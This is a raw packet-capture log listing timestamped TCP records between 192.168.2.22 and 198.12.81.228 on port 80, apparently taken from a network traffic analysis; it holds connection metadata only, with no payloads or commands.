                                                                              Aug 28, 2024 22:29:40.382025957 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382086039 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382096052 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382124901 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382158995 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382174969 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382184982 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382200956 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382204056 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382236004 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382266045 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382276058 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382286072 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382294893 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382306099 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382313013 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382324934 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382487059 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382497072 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382507086 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382518053 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382529020 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382534027 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382540941 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382553101 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382556915 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382565022 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382575989 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382579088 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382586956 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382600069 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382611990 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382628918 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382658958 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382669926 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382818937 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382822990 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382829905 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382839918 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382849932 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382859945 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382870913 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382872105 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382883072 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382894039 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382894993 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382908106 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382919073 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382920980 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382955074 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.382955074 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382967949 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382983923 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.382993937 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383003950 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383021116 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383043051 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383234978 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383245945 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383255005 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383268118 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383275032 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383280039 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383291006 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383301973 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383311987 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383312941 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383325100 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383335114 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383346081 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383346081 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383357048 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383367062 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383378029 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383379936 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383389950 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383395910 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383491993 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383531094 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383542061 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383550882 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383560896 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383573055 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383579969 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383585930 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383588076 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383598089 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383621931 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383677006 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383693933 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383706093 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383717060 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383727074 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383730888 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383738041 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383749008 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383765936 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383778095 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383898973 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383909941 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383919954 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383929968 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383940935 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383943081 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.383949995 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.383975029 CEST4917280192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:40.384044886 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384057045 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384068966 CEST8049172198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:40.384082079 CEST8049172198.12.81.228192.168.2.22
Aug 28, 2024 22:29:40.384092093 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384107113 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.384109974 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384121895 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.384123087 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384144068 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.384146929 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384160995 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384170055 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384181976 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384182930 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.384192944 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384203911 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384215117 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384224892 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.384402990 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384413958 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384423971 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384433985 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384445906 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384452105 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.384457111 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.384471893 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.384496927 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.422538042 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.422549009 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.422557116 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.422590017 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.422960997 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.422971010 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.422981977 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.422992945 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.423002005 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.423017979 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.423028946 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468215942 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468230009 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468235970 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468302011 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468512058 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468523979 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468540907 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468550920 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468560934 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468564034 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468574047 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468584061 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468591928 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468602896 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468602896 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468614101 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468625069 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468635082 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468643904 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468652010 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468661070 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468663931 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468672037 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468681097 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468692064 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468704939 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468707085 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468715906 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468727112 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468738079 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468739986 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468750000 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468760967 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468761921 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468774080 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468782902 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468786001 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468802929 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468812943 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468822956 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468823910 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468848944 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468904972 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468915939 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468925953 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468943119 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468951941 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.468955040 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468971014 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468982935 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468995094 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.468996048 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469005108 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469022036 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469032049 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469062090 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469073057 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469089031 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469129086 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469204903 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469216108 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469227076 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469247103 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469254017 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469258070 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469269991 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469297886 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469311953 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469324112 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469331980 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469341993 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469355106 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469366074 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469469070 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469480038 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469490051 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469501019 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469511986 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469515085 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469517946 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469530106 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469556093 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469588995 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469599009 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469675064 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469686985 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469696045 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469707012 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469721079 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469746113 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469752073 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469763041 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469772100 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469780922 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469798088 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469808102 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469870090 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469881058 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469892025 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469901085 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469912052 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.469929934 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.469949007 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470038891 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470057964 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470067978 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470077991 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470088959 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470089912 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470099926 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470112085 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470130920 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470140934 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470154047 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470175028 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470240116 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470251083 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470259905 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470284939 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470361948 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470371962 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470381975 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470392942 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470402956 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470419884 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470422029 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470437050 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470454931 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470464945 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470470905 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470477104 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470506907 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470581055 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470591068 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470602036 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470613956 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470624924 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470642090 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470654011 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470695972 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470706940 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470716953 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470729113 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470737934 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.470757961 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.470768929 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.474039078 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.509458065 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.509468079 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.509480953 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.509521961 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.509597063 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.509608984 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.509618998 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.509629011 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.509639025 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.509644985 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.509669065 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.554963112 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555041075 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555049896 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555061102 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555072069 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555094004 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555094957 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555104971 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555107117 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555171013 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555366993 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555423975 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555475950 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555485964 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555495977 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555517912 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555524111 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555535078 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555545092 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555579901 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555596113 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555608034 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555618048 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555634022 CEST  49172  80     192.168.2.22   198.12.81.228
Aug 28, 2024 22:29:40.555701017 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555711985 CEST  80     49172  198.12.81.228  192.168.2.22
Aug 28, 2024 22:29:40.555722952 CEST  80     49172  198.12.81.228  192.168.2.22
